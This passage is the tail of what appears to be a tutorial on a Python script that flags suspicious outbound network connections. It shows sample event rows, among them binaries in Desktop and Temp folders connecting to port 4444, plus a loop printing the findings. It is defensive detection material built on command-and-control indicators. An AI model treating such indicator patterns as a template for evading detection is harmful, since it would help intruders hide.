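2013-05-01T10:00:01,C:\\Windows\\System32\\svchost.exe,NT AUTHORITY\\SYSTEM,10.0.0.5,443,true
2013-05-01T10:02:13,C:\\Users\\alice\\Desktop\\IDM.exe,WIN8\\alice,203.0.113.7,4444,true
2013-05-01T10:02:20,C:\\Program Files\\Internet Explorer\\iexplore.exe,WIN8\\alice,93.184.216.34,80,true
2013-05-01T10:05:00,C:\\Users\\alice\\AppData\\Local\\Temp\\update.exe,WIN8\\alice,198.51.100.9,443,true
2013-05-01T10:06:00,C:\\Windows\\System32\\svchost.exe,NT AUTHORITY\\SYSTEM,198.51.100.9,4444,false
"""

if __name__ == "__main__":
    for image, dest, reasons in find_suspicious(SAMPLE_EVENTS):
        print(image, "->", dest)
        for r in reasons:
            print("   ", r)
```

Both the Desktop binary on port 4444 and the Temp binary on 443 are reported; the system svchost connections are not, which is the distinction a host firewall alone cannot make.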